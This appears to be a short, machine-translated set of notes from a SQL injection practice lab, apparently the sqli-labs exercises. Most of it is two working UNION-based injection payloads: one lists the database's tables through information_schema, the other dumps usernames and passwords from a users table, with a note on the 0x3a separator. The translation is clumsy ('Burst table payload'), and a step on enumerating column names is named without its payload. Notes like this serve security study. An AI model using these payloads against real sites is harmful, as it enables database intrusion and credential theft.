Burst table payload
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
Found in emails, referers, uagents, users, apparently users are user data table
Burst column name (field) payload
Explosive payload value
?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+
0x3a: 0x are hexadecimal flag, 3a decimal 58, in an ascii ':' for dividing pasword and username.